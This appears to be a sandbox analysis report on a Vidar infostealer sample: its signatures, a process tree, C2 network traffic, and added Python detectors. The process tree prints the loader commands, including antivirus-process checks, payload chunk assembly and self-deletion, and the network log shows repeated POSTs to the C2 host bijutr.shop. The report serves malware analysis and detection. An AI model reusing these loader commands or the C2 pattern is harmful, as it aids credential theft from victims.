Analysis

  • max time kernel
    40s
  • max time network
    39s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24/12/2024, 07:56 UTC

General

  • Target

    PodcastsTries.exe

  • Size

    1.2MB

  • MD5

    20bef33e4a0add922ae043e2aed13ea2

  • SHA1

    4d0353be8234f56862b7ea7ece4ded3eeef91cbb

  • SHA256

    847c28adfa050608203f206d31cce27f1f27e89ab138908473c8c69ccf388ca2

  • SHA512

    7a387b96497c0026d01820e586e4d0a9686b9927c3270a18170a1e5c138dc8bbee759bed63058fdc865a613956ca7258f7058a6fff78a156f85d6d9a8421c469

  • SSDEEP

    24576:Fx9yUoL9cVIpol/OQy1HvVrQaygJy/LilXabJUbsVF1M2/y:X9loLhpWIHtUvgyz4KbJYsVzy

Malware Config

Signatures

  • Detect Vidar Stealer 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempts to gather information about the victim system's language in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PodcastsTries.exe
    "C:\Users\Admin\AppData\Local\Temp\PodcastsTries.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5104
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3752
      • C:\Windows\SysWOW64\findstr.exe
        findstr /I "opssvc wrsa"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1104
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2812
      • C:\Windows\SysWOW64\findstr.exe
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4640
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c md 680662
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2528
      • C:\Windows\SysWOW64\extrac32.exe
        extrac32 /Y /E Memo
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4104
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V "OBTAINING" Compensation
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4336
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1588
      • C:\Users\Admin\AppData\Local\Temp\680662\Billion.com
        Billion.com T
        3⤵
        • Checks computer location settings
        • Deletes itself
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:60
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\QQI5XT2689RI" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1464
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 10
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:1352
      • C:\Windows\SysWOW64\choice.exe
        choice /d y /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4472
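
The process tree above is a complete loader chain built entirely from Windows utilities: an extensionless dropped file is renamed to Assessing.cmd and run in the same command, tasklist output is grepped for security-product process names (opssvc, wrsa, AvastUI, AVGUI, bdservicehost, nsWscSvc, ekrn, SophosHealth), a cabinet is expanded with extrac32, four chunks (Honey, Biotechnology, Enzyme, Harvard) are concatenated with copy /b into T, the dropped Billion.com is executed from the Temp directory with T as its argument, and a final timeout/del command removes Billion.com. No single step is malicious on its own, so detection has to key on the combination. The Python below is an added example for this report, not part of Triage's output or of the sample: it encodes those stages as rules over constructed Sysmon-style process-creation events whose command lines are copied from the tree. The parent of PodcastsTries.exe is assumed to be explorer.exe; field names, rule names and the stage count are this example's own assumptions.

```python
"""Heuristic detection of the batch-file loader chain in the process tree above.

Added example for this Triage report, not Triage's code or the sample's.
Events are constructed in a Sysmon Event ID 1 (process creation) style with
command lines copied from the report; field names, rule names and scoring
are assumptions of this example.
"""
import re
from dataclasses import dataclass

# Security-product process names the loader greps tasklist output for,
# taken verbatim from the two findstr invocations in the report.
AV_PROCESS_NAMES = {"opssvc", "wrsa", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "ekrn", "sophoshealth"}

# "move X X.cmd & X.cmd": give a dropped file a script extension and run it.
RENAME_AND_RUN = re.compile(r"\bmove\s+(\S+)\s+\1\.(cmd|bat)\s*&\s*\1\.\2", re.I)
# "copy /b a + b + c out": reassemble a payload that was dropped in chunks.
BINARY_CONCAT = re.compile(r"\bcopy\s+/b\s+\S+(?:\s*\+\s*\S+)+", re.I)
# "timeout /t N & del [/f /q] <path>": delayed deletion; group 1 is the path.
SELF_DELETE = re.compile(
    r'timeout\s+/t\s+\d+\s*&\s*del\s+(?:/[a-z]\s+)*"?([^"&]+?)"?\s*(?:&|$)', re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


@dataclass
class ProcEvent:
    pid: int
    image: str
    command_line: str
    parent_image: str


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Map pid -> list of rule names for every event that matches a rule."""
    hits = {}
    for ev in events:
        name = _basename(ev.image)
        cl = ev.command_line
        matched = []
        if name == "cmd.exe":
            if RENAME_AND_RUN.search(cl):
                matched.append("rename_to_cmd_and_execute")
            if BINARY_CONCAT.search(cl):
                matched.append("binary_chunk_concatenation")
            m = SELF_DELETE.search(cl)
            # Only count it as self-deletion if the target is the parent's own image.
            if m and m.group(1).strip().lower() == ev.parent_image.lower():
                matched.append("self_delete_via_timeout")
        elif name == "findstr.exe":
            tokens = {t.strip('"').lower() for t in cl.split()}
            if tokens & AV_PROCESS_NAMES:
                matched.append("av_process_name_grep")
        elif (name == "extrac32.exe" and re.search(r"\s/E\b", cl, re.I)
              and _basename(ev.parent_image) == "cmd.exe"):
            matched.append("cab_extraction_from_batch")
        elif name.endswith(".com") and TEMP_DIR.search(ev.image):
            matched.append("dropped_com_executed_from_temp")
        if matched:
            hits[ev.pid] = matched
    return hits


def chain_score(hits):
    """Distinct loader stages seen across one tree; four or more is a strong signal."""
    return len({rule for rules in hits.values() for rule in rules})


# Constructed events mirroring the report's tree (explorer.exe parent is assumed).
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(5104, TEMP + r"\PodcastsTries.exe", '"' + TEMP + r'\PodcastsTries.exe"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(1736, CMD, r'"C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd',
              TEMP + r"\PodcastsTries.exe"),
    ProcEvent(3752, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist", CMD),
    ProcEvent(1104, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "opssvc wrsa"', CMD),
    ProcEvent(4640, r"C:\Windows\SysWOW64\findstr.exe",
              'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"', CMD),
    ProcEvent(4104, r"C:\Windows\SysWOW64\extrac32.exe", "extrac32 /Y /E Memo", CMD),
    ProcEvent(4336, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "OBTAINING" Compensation', CMD),
    ProcEvent(1588, CMD, r"cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T", CMD),
    ProcEvent(60, TEMP + r"\680662\Billion.com", "Billion.com T", CMD),
    ProcEvent(1464, CMD,
              r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "' + TEMP +
              r'\680662\Billion.com" & rd /s /q "C:\ProgramData\QQI5XT2689RI" & exit',
              TEMP + r"\680662\Billion.com"),
    ProcEvent(4472, r"C:\Windows\SysWOW64\choice.exe", "choice /d y /t 5", CMD),
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for pid, rules in found.items():
        print(pid, rules)
    print("distinct stages:", chain_score(found))
```

The findstr argument lists are themselves a usable fingerprint: opssvc is Quick Heal, wrsa is Webroot, AvastUI and AVGUI are Avast/AVG, bdservicehost is Bitdefender, nsWscSvc is Norton, ekrn is ESET and SophosHealth is Sophos. The findstr /V "OBTAINING" Compensation call deliberately does not fire, and tasklist on its own is left alone because it is far too common to alert on; the value is in the stage count across one parent chain, not in any single process.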

Network

  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    14.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    NsxXzupCMoDsL.NsxXzupCMoDsL
    Billion.com
    Remote address:
    8.8.8.8:53
    Request
    NsxXzupCMoDsL.NsxXzupCMoDsL
    IN A
    Response
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    t.me
    Billion.com
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/k04ael
    Billion.com
    Remote address:
    149.154.167.99:443
    Request
    GET /k04ael HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 24 Dec 2024 07:56:52 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12300
    Connection: keep-alive
    Set-Cookie: stel_ssid=cbcf4f097c09d3e5eb_11856170444056257155; expires=Wed, 25 Dec 2024 07:56:52 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-us
    DNS
    bijutr.shop
    Billion.com
    Remote address:
    8.8.8.8:53
    Request
    bijutr.shop
    IN A
    Response
    bijutr.shop
    IN A
    188.245.216.205
  • flag-de
    GET
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    99.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AAAAIMY5PH47QQ9ZM79H
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 255
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----ZM7Q1DTJW4E37Q9ZCBA1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    205.216.245.188.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.216.245.188.in-addr.arpa
    IN PTR
    Response
    205.216.245.188.in-addr.arpa
    IN PTR
    static.205.216.245.188.clients.your-server.de
  • flag-us
    DNS
    e5.o.lencr.org
    Billion.com
    Remote address:
    8.8.8.8:53
    Request
    e5.o.lencr.org
    IN A
    Response
    e5.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    88.221.134.137
    a1887.dscq.akamai.net
    IN A
    88.221.134.89
    a1887.dscq.akamai.net
    IN A
    88.221.135.105
  • flag-gb
    GET
    http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D
    Billion.com
    Remote address:
    88.221.134.137:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: e5.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 344
    ETag: "B9B42073838921AAFDF1B2D682205E93C3EACD4403D3040271811EE98CA4616F"
    Last-Modified: Mon, 23 Dec 2024 08:55:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=17279
    Expires: Tue, 24 Dec 2024 12:44:52 GMT
    Date: Tue, 24 Dec 2024 07:56:53 GMT
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----OPZUASJEKF3E3EKX4WTJ
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    137.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    137.134.221.88.in-addr.arpa
    IN PTR
    Response
    137.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-137.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
    Response
    168.245.100.95.in-addr.arpa
    IN PTR
    a95-100-245-168.deploy.static.akamaitechnologies.com
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----H47YMOPPPH4E37Q9R9R1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 300
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----V3E3OP8QIMOZUAIMOHVS
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----MGVK6PPPH4E37YCJMY5F
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Billion.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----MGDJMO8GV3WBIMG4EK6X
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 24 Dec 2024 07:56:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    92.12.20.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    92.12.20.2.in-addr.arpa
    IN PTR
    Response
    92.12.20.2.in-addr.arpa
    IN PTR
    a2-20-12-92.deploy.static.akamaitechnologies.com
  • 149.154.167.99:443
    https://t.me/k04ael
    tls, http
    Billion.com
    1.5kB
    19.4kB
    24
    20

    HTTP Request

    GET https://t.me/k04ael

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.0kB
    3.0kB
    11
    8

    HTTP Request

    GET https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.4kB
    565 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.5kB
    598 B
    9
    7

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 88.221.134.137:80
    http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D
    http
    Billion.com
    467 B
    862 B
    5
    3

    HTTP Request

    GET http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.5kB
    558 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    2.2kB
    598 B
    10
    7

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.5kB
    558 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.4kB
    518 B
    8
    5

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Billion.com
    1.4kB
    518 B
    8
    5

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    14.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    NsxXzupCMoDsL.NsxXzupCMoDsL
    dns
    Billion.com
    73 B
    148 B
    1
    1

    DNS Request

    NsxXzupCMoDsL.NsxXzupCMoDsL

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    t.me
    dns
    Billion.com
    50 B
    66 B
    1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    bijutr.shop
    dns
    Billion.com
    57 B
    73 B
    1
    1

    DNS Request

    bijutr.shop

    DNS Response

    188.245.216.205

  • 8.8.8.8:53
    99.167.154.149.in-addr.arpa
    dns
    73 B
    166 B
    1
    1

    DNS Request

    99.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    205.216.245.188.in-addr.arpa
    dns
    74 B
    133 B
    1
    1

    DNS Request

    205.216.245.188.in-addr.arpa

  • 8.8.8.8:53
    e5.o.lencr.org
    dns
    Billion.com
    60 B
    175 B
    1
    1

    DNS Request

    e5.o.lencr.org

    DNS Response

    88.221.134.137
    88.221.134.89
    88.221.135.105

  • 8.8.8.8:53
    137.134.221.88.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    137.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    168.245.100.95.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    168.245.100.95.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    92.12.20.2.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    92.12.20.2.in-addr.arpa
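
On the network side, Billion.com first fetches https://t.me/k04ael with no User-Agent header at all, then resolves bijutr.shop and sends a GET followed by a series of small multipart/form-data POSTs (255 to 300 bytes each) using a macOS Opera User-Agent from a Windows 10 host. That ordering is consistent with the Telegram page acting as a dead-drop resolver for the C2 address, a documented Vidar technique, although the report does not show the page body, so that remains an inference. The GET to e5.o.lencr.org is Windows CryptoAPI fetching an OCSP response for the Let's Encrypt certificate on bijutr.shop and is not attacker-controlled traffic. The Python below is an added example for this report, not Triage's code or the sample's: it parses raw HTTP request heads as printed above and flags the properties that separate the malware's requests from browser traffic. The request texts are copied from the report except for the Chrome request, which is constructed as a benign control; the host-OS baseline, the browser allow-list and the size threshold are assumptions.

```python
"""Flag HTTP requests that imitate, or omit, a browser identity.

Added example for this Triage report, not its output or the sample's code.
Request heads are copied from the report except CHROME_GET (constructed
control). HOST_OS, KNOWN_BROWSERS and the size threshold are assumptions.
"""
import re

HOST_OS = "windows"  # analysis VM is windows10-2004_x64 (assumed baseline)
# Processes expected to send a browser User-Agent (assumed allow-list).
KNOWN_BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "opera.exe",
                  "brave.exe", "iexplore.exe"}
UA_PLATFORMS = {
    "windows": re.compile(r"Windows NT", re.I),
    "mac": re.compile(r"Macintosh|Mac OS X", re.I),
    "linux": re.compile(r"Linux|X11", re.I),
}
# Real browsers send at least one of these with every page request.
BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding")


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, headers)."""
    lines = raw.strip("\n").splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def ua_platform(ua):
    for name, rx in UA_PLATFORMS.items():
        if rx.search(ua):
            return name
    return "unknown"


def assess(raw_request, process_name):
    """Return the findings for one request sent by process_name."""
    method, path, h = parse_request(raw_request)
    findings = []
    ua = h.get("user-agent")
    if ua is None:
        findings.append("no_user_agent")
    else:
        plat = ua_platform(ua)
        if plat not in ("unknown", HOST_OS):
            findings.append("ua_platform_mismatch:" + plat)
        claims_browser = ua.startswith("Mozilla/")
        if claims_browser and process_name.lower() not in KNOWN_BROWSERS:
            findings.append("browser_ua_from_non_browser")
        if claims_browser and not any(k in h for k in BROWSER_HEADERS):
            findings.append("browser_ua_without_accept_headers")
    if (method == "POST" and path == "/"
            and h.get("content-type", "").startswith("multipart/form-data")
            and int(h.get("content-length", "0")) < 1024):
        findings.append("small_multipart_post_to_root")
    return findings


T_ME_GET = """GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
"""

BIJUTR_POST = """POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAAAIMY5PH47QQ9ZM79H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 255
Connection: Keep-Alive
Cache-Control: no-cache
"""

OCSP_GET = """GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: e5.o.lencr.org
"""

# Constructed control: a genuine Chrome page load from a Windows 10 host.
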